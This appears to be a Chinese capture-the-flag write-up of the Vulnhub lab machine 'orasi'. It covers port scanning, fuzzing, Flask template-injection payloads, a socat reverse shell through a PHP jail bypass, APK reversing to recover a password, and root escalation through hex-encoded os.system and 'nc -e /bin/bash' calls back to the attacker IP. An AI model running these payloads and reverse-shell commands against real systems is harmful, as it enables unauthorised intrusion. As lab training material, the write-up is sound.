orasi

攻击者ip：192.168.56.132 桥接（自动） vmare

受害者ip：192.168.56.133 仅主机 vxbox

主机发现

arp-scan -l

端口扫描

nmap -p- -sV 192.168.56.133

发现21ftp服务，尝试匿名登陆

anonymous

下载url文件·

得到：/sh4d0w$s，文件名也提示了这是个路劲

访问web界面

访问5000端口

返回 no input，应该是要输入什么东西，想到的就是文件包含命令执行之类的，不过没有参数，模糊测试一下（扫描时要在sh4d0w$s的 $ 前加 转义），字典的话想到 80 端口上的 “6 6 1337leet”，想了想应该是让用 crunch 生成字典：

crunch 6 6 1337leet -o wordlist.txt

模糊测试

ffuf -u "http://192.168.56.133:5000/sh4d0w$s?FUZZ=../../../../../etc/passwwd" -w wordlist.txt -fs 8

l333tt 可以，查看一下：

漏洞利用

猜测应该是 SSTI （服务器模板注入）。

确实是 SSTI（{{}}在模板引擎中作为变量包裹标识符，模板引擎在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。如此一来就可以实现如同sql注入一样的注入漏洞。），CTF平台上也有类似的题，bugku 等，使用类来进行注入：

__class__类的一个内置属性，表示实例对象的类。__base__类型对象的直接基类__bases__类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases____mro__此属性是由类组成的元组，在方法解析期间会基于它来查找基类。__subclasses__()返回这个类的子类集合，Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.__init__初始化类，返回的类型是function__globals__使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。__dic__类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里__getattribute__()实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作的时候（形如：a.xxx/a.xxx()），都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。__getitem__()调用字典中的键值，其实就是调用这个魔术方法，比如a['b']，就是a.__getitem__('b')__builtins__内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。__import__动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__('os').popen('ls').read()]__str__()返回描写这个对象的字符串，可以理解成就是打印出来。url_forflask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。lipsumflask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：{{lipsum.__globals__['os'].popen('ls').read()}}current_app应用上下文，一个全局变量。request可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/procselffd/3').read()request.args.x1 get传参request.values.x1  所有参数request.cookiescookies参数request.headers请求头参数request.form.x1 post传参(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)request.data post传参(Content-Type:a/b)request.json post传json(Content-Type: application/json)config当前application的所有配置。此外，也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}g{{g}}得到

构造payload：{{ config.class.init.globals['os'].popen('ls -la').read() }}

有nc，反弹shell

反弹成功

提权

发现能用 /bin/php /home/kori/jail.php，查看一下 /home/kori/jail.php

脚本会执行命令。但是，如果命令匹配某些关键字，如 bash、eval、nc 等，则会显示 “Restricted characters has been used”。并且它还限制使用“/”。发现靶机上有 socat，那用socat获取 kori 用户：

反弹shell

sudo -u kori /bin/php /home/kori/jail.php socat exec:'sh',pty,stderr,setsid,sigint,sane tcp:192.168.56.132:2222

尝试将irida.apk复制

先把 kori 的家目录赋予其他用户访问的权限

chmod o+w .

先创建一个同名文件，然后再复制过来

现在能访问这个文件了，因为是个 apk 文件，所以我把它从靶机上弄了下来用 AndroidKiller 进行逆向分析：

在 LoginDataSource.smail 中发现有用户名密码，右键查看 jd-gui 打开（要有 jd-gui 软件）：

观察可以发现参数一是 irida，参数二采取了一种密码保护，保护机制是：1#2#3#4#5，对应下面 0.1.2.3.4 的字符串，并且每一个中间都加 “.”，这个密码应该就是 irida 用户的密码，拼接后的结果是：eye.of.the.tiger.()，尝试切换失败，其实在 vulnhub 中的靶机页面就有提示：

有一个点是没有用的，根据上面的密码，判断 （） 前的 . 应该是要去掉的，所以最后的密码是：eye.of.the.tiger()。切换诚 irida 用户：

继续使用sudo -l查看下当前账户是否存在可以使用的特权命令，发现存在：(root) NOPASSWD: /usr/bin/python3 /root/oras.py。

ValueError: non-hexadecimal number found in fromhex() arg at position 3

ValueError:在fromhex() arg的位置3发现非十六进制数字

那就将import os;os.system("/bin/bash -i");代码进行hex编码，然后输入执行，成功提权到root账户

https://try8.cn/tool/code/hex

696d706f7274206f733b6f732e73797374656d28222f62696e2f62617368202d6922293b

或者使用nc

python3 -c "print(b"__import__('os').system('nc -e /bin/bash 192.168.56.132 3333')".hex())" | sudo python3 /root/oras.py

原文始发于微信公众号（王之暴龙战神）：orasi